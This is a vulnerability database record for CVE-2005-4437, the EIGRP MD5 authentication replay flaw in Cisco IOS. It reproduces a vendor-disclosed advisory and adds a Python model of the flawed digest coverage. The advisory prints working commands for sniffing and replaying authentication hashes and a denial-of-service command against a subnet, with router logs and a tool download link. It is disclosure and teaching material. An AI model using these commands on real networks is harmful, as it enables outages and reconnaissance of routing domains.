Cisco EIGRP protocol HELLO packet replay vulnerability

Vulnerability ID: 1196836    Vulnerability type: design error
Published: 2005-12-20    Updated: 2009-03-04
CVE ID: CVE-2005-4437    CNNVD ID: CNNVD-200512-469
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2005120054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-469
|Vulnerability details
MD5 neighbor authentication in Extended Interior Gateway Routing Protocol (EIGRP) 1.2, as implemented in Cisco IOS 11.3 and later, does not include the Message Authentication Code (MAC) in the checksum. Remote attackers can therefore sniff message hashes and (1) replay EIGRP HELLO messages, or (2) cause a denial of service by sending a large number of spoofed EIGRP neighbor announcements, which triggers an ARP storm on the local network.
|Vulnerability EXP
Arhont Ltd. - Information Security

Arhont Advisory by: Arhont Ltd
Advisory:           Authenticated EIGRP DoS / Information leak
Class:              design bug
Version:            EIGRP version 1.2
Model Specific:     Other versions might have the same bug

DETAILS:

From experiments with capturing and replaying back at the router a 
variety of authenticated EIGRP packets, it appears that the MD5 
algorithm is run against the following packet fields: Opcode, AS number, 
Flags, Sequence Number, Nexthop. Thus, the presence of a Message 
Authentication Code (MAC) does not stop attackers from replaying HELLO 
packets back at the router. The only condition needed is to sniff the 
hash and throw it back at the EIGRP routers. An example of this would be

1. Sniff
arhontus# ./eigrp.pl --sniff --iface eth0
<skip>
<<<Authentication data: 0002>>>
         Size: 40
         Key ID: 2
         MD5 key digest: efe07403446c77a9697fe5753f79e52
         Key in one string (Copy & paste to replay)
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52

2. Replay
arhontus#./eigrp.pl --hello --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52

The packets are received well and trigger back an EIGRP update to sniff 
it and find more about the network topology:
061751: 04:13:46: EIGRP: received packet with MD5 authentication, key id = 2
061752: 04:13:46: EIGRP: Received HELLO on Ethernet0/0 nbr 192.168.66.112
061753: 04:13:46:   AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/1
061754: 04:13:46: EIGRP: Sending UPDATE on Ethernet0/0 nbr 192.168.66.112, retry 2, RTO 4500
061755: 04:13:46:   AS 1, Flags 0x9, Seq 2162/0 idbQ 1/0 iidbQ un/rely 0/0 peerQ un/rely 0/1 serno 3-8

As a result of it, additional information about the EIGRP domain can be 
collected from the triggered UPDATE packets.

Besides, using this method the FX EIGRP/ARP DoS attack (BID 6443) can be 
ported to the authenticated EIGRP routing domain. This is done by 
combining --hellodos and --auth <captured hash> flags when running the 
attack using our EIGRP packet generator. The attack appears to be more 
efficient than the original attack described by FX, since the routers 
recover much slower. This is possibly due to the additional overhead of 
processing the authentication information. An example of the attack 
command killing the network would be
arhontus#./eigrp.pl --hellodos 192.168.66.0 --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52 --source 192.168.66.112

Tool: http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz

Risk Factor: Medium for DoS, Low for the Information Leak

Workarounds: Extend the Message Authentication Code onto the currently 
unauthenticated EIGRP packet fields.

Communication History: sent to PSIRT on 10/10/05

*According to the Arhont Ltd. policy, all of the found vulnerabilities 
and security issues will be reported to the manufacturer at least 7 days 
before releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do 
not hesitate to contact the Arhont team.*
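As an added illustration, not code from the Arhont advisory or the CNNVD record, the following Python models the coverage problem described under DETAILS and the proposed workaround: a keyed digest computed over only the five fields the advisory lists still verifies for a HELLO whose uncovered fields were changed, while extending the digest to every field rejects it. The packet layout, the `MD5(key || fields)` construction, the field values and the key are constructed assumptions for the model, not Cisco's actual implementation.

```python
import hashlib
from dataclasses import dataclass, replace

# Constructed, simplified model of an EIGRP HELLO with MD5 neighbor
# authentication. Field names follow the advisory; the keyed digest
# "MD5(key || covered fields)" is an assumption, not Cisco's construction.
@dataclass(frozen=True)
class Hello:
    opcode: int       # 5 = HELLO
    as_number: int
    flags: int
    seq: int
    nexthop: str
    holdtime: int     # not among the fields the advisory found covered
    source: str       # sender address, also not covered

# Fields the advisory observed the MD5 being run against.
COVERED_AS_SHIPPED = ("opcode", "as_number", "flags", "seq", "nexthop")
# The advisory's workaround: extend the MAC to every packet field.
COVERED_FIXED = COVERED_AS_SHIPPED + ("holdtime", "source")

def digest(pkt: Hello, key: bytes, covered: tuple) -> str:
    """Keyed digest over the named fields only (model, see comment above)."""
    material = b"|".join(str(getattr(pkt, f)).encode() for f in covered)
    return hashlib.md5(key + material).hexdigest()

def verify(pkt: Hello, mac: str, key: bytes, covered: tuple) -> bool:
    """Receiver-side check: recompute over the same field set and compare."""
    return digest(pkt, key, covered) == mac

KEY = b"constructed-key-id-2"          # constructed shared secret
genuine = Hello(opcode=5, as_number=1, flags=0, seq=0,
                nexthop="0.0.0.0", holdtime=15, source="192.168.66.1")
captured_mac = digest(genuine, KEY, COVERED_AS_SHIPPED)   # what a sniffer sees

# Same captured hash attached to a HELLO whose uncovered fields differ.
modified = replace(genuine, holdtime=1, source="192.168.66.112")

def as_shipped_accepts_modified() -> bool:
    # Uncovered fields changed, yet the digest still matches: True
    return verify(modified, captured_mac, KEY, COVERED_AS_SHIPPED)

def fixed_accepts_modified() -> bool:
    # With full coverage the genuine packet's digest no longer fits: False
    return verify(modified, digest(genuine, KEY, COVERED_FIXED), KEY, COVERED_FIXED)

def fixed_accepts_genuine() -> bool:
    # Full coverage still accepts the unmodified packet: True
    return verify(genuine, digest(genuine, KEY, COVERED_FIXED), KEY, COVERED_FIXED)
```

Extending coverage only blocks reuse of a captured hash on a packet whose other fields were altered; a byte-identical HELLO (the advisory's logs show HELLOs with Seq 0/0) still verifies unless some per-packet freshness value is also authenticated.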
|References

Source: BUGTRAQ
Name: 20051220 Re: Unauthenticated EIGRP DoS
Link: http://www.securityfocus.com/archive/1/archive/1/419898/100/0/threaded
Source: BUGTRAQ
Name: 20051219 Authenticated EIGRP DoS / Information leak
Link: http://www.securityfocus.com/archive/1/archive/1/419830/100/0/threaded
Source: OVAL
Name: oval:org.mitre.oval:def:5741
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5741
Source: FULLDISC
Name: 20051220 RE: Authenticated EIGRP DoS / Information leak
Link: http://marc.theaimsgroup.com/?l=full-disclosure&m=113504451523186&w=2
Source: FULLDISC
Name: 20051219 Authenticated EIGRP DoS / Information leak
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/040332.html
Source: BID
Name: 15970
Link: http://www.securityfocus.com/bid/15970
Source: VUPEN
Name: ADV-2005-3008
Link: http://www.frsirt.com/english/advisories/2005/3008
Source: SECTRACK
Name: 1015382
Link: http://securitytracker.com/id?1015382
Source: SREASON
Name: 274
Link: http://securityreason.com/securityalert/274